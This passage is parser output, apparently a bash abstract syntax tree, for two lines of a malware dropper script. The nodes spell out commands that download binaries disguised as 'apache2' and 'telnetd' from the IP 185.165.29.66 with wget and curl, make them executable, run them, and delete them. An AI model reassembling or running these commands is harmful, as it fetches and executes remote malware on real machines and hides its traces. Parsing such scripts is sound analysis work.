    WordNode(lineno=13, pos=(2038, 2040), word='cd'),
    WordNode(lineno=13, pos=(2041, 2042), word='/'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(2042, 2043)),
  CommandNode(lineno=13, pos=(2044, 2077), parts=[
    WordNode(lineno=13, pos=(2044, 2048), word='wget'),
    WordNode(lineno=13, pos=(2049, 2077), word='http://185.165.29.66/apache2'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(2077, 2078)),
  CommandNode(lineno=13, pos=(2079, 2115), parts=[
    WordNode(lineno=13, pos=(2079, 2083), word='curl'),
    WordNode(lineno=13, pos=(2084, 2086), word='-O'),
    WordNode(lineno=13, pos=(2087, 2115), word='http://185.165.29.66/apache2'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(2115, 2116)),
  CommandNode(lineno=13, pos=(2117, 2133), parts=[
    WordNode(lineno=13, pos=(2117, 2122), word='chmod'),
    WordNode(lineno=13, pos=(2123, 2125), word='+x'),
    WordNode(lineno=13, pos=(2126, 2133), word='apache2'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(2133, 2134)),
  CommandNode(lineno=13, pos=(2135, 2144), parts=[
    WordNode(lineno=13, pos=(2135, 2144), word='./apache2'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(2144, 2145)),
  CommandNode(lineno=13, pos=(2146, 2160), parts=[
    WordNode(lineno=13, pos=(2146, 2148), word='rm'),
    WordNode(lineno=13, pos=(2149, 2152), word='-rf'),
    WordNode(lineno=13, pos=(2153, 2160), word='apache2'),
  ]),
])
ListNode(lineno=14, pos=(2161, 2332), parts=[
  CommandNode(lineno=14, pos=(2161, 2168), parts=[
    WordNode(lineno=14, pos=(2161, 2163), word='cd'),
    WordNode(lineno=14, pos=(2164, 2168), word='/tmp'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(2169, 2171)),
  CommandNode(lineno=14, pos=(2172, 2183), parts=[
    WordNode(lineno=14, pos=(2172, 2174), word='cd'),
    WordNode(lineno=14, pos=(2175, 2183), word='/var/run'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(2184, 2186)),
  CommandNode(lineno=14, pos=(2187, 2194), parts=[
    WordNode(lineno=14, pos=(2187, 2189), word='cd'),
    WordNode(lineno=14, pos=(2190, 2194), word='/mnt'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(2195, 2197)),
  CommandNode(lineno=14, pos=(2198, 2206), parts=[
    WordNode(lineno=14, pos=(2198, 2200), word='cd'),
    WordNode(lineno=14, pos=(2201, 2206), word='/root'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(2207, 2209)),
  CommandNode(lineno=14, pos=(2210, 2214), parts=[
    WordNode(lineno=14, pos=(2210, 2212), word='cd'),
    WordNode(lineno=14, pos=(2213, 2214), word='/'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(2214, 2215)),
  CommandNode(lineno=14, pos=(2216, 2249), parts=[
    WordNode(lineno=14, pos=(2216, 2220), word='wget'),
    WordNode(lineno=14, pos=(2221, 2249), word='http://185.165.29.66/telnetd'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(2249, 2250)),
  CommandNode(lineno=14, pos=(2251, 2287), parts=[
    WordNode(lineno=14, pos=(2251, 2255), word='curl'),
    WordNode(lineno=14, pos=(2256, 2258), word='-O'),
    WordNode(lineno=14, pos=(2259, 2287), word='http://185.165.29.66/telnetd'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(2287, 2288)),
  CommandNode(lineno=14, pos=(2289, 2305), parts=[
    WordNode(lineno=14, pos=(2289, 2294), word='chmod'),
    WordNode(lineno=14, pos=(2295, 2297), word='+x'),
    WordNode(lineno=14, pos=(2298, 2305), word='telnetd'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(2305, 2306)),
  CommandNode(lineno=14, pos=(2307, 2316), parts=[
    WordNode(lineno=14, pos=(2307, 2316), word='./telnetd'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(2316, 2317)),
  CommandNode(lineno=14, pos=(2318, 2332), parts=[
    WordNode(lineno=14, pos=(2318, 2320), word='rm'),
    WordNode(lineno=14, pos=(2321, 2324), word='-rf'),
    WordNode(lineno=14, pos=(2325, 2332), word='telnetd'),
  ]),
])
